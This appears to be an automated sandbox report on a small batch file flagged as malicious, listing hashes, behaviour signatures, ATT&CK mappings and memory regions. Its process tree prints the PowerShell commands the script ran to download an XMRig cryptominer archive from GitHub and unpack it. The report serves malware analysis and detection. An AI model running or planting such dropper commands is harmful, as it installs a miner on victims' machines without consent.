Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    3.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2548

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0A6U6U56UGWX0DAODVGK.temp
    Filesize

    7KB

    MD5

    07cf9f9db0ce01638ad20907894c63bc

    SHA1

    16b7a759a3724e90164a6e28e03e6f204e7de39f

    SHA256

    ab5cc39d4be229390923ebea3d6ba3e3ef0121d4276df0064b71d49ec79747a6

    SHA512

    a9f7f41ed19f300e7f3f67030983ac38bd3e293561479a34c62542d0af6b992d8688cc6375d8853907d779ff998074959950d26e45e1b59c5b73817f2a0a07a6

  • memory/2548-19-0x0000000002790000-0x0000000002798000-memory.dmp
    Filesize

    32KB

  • memory/2548-18-0x000000001B640000-0x000000001B922000-memory.dmp
    Filesize

    2.9MB

  • memory/2612-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp
    Filesize

    4KB

  • memory/2612-5-0x000000001B760000-0x000000001BA42000-memory.dmp
    Filesize

    2.9MB

  • memory/2612-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-7-0x0000000001D90000-0x0000000001D98000-memory.dmp
    Filesize

    32KB

  • memory/2612-6-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-10-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-11-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB

  • memory/2612-12-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
    Filesize

    9.6MB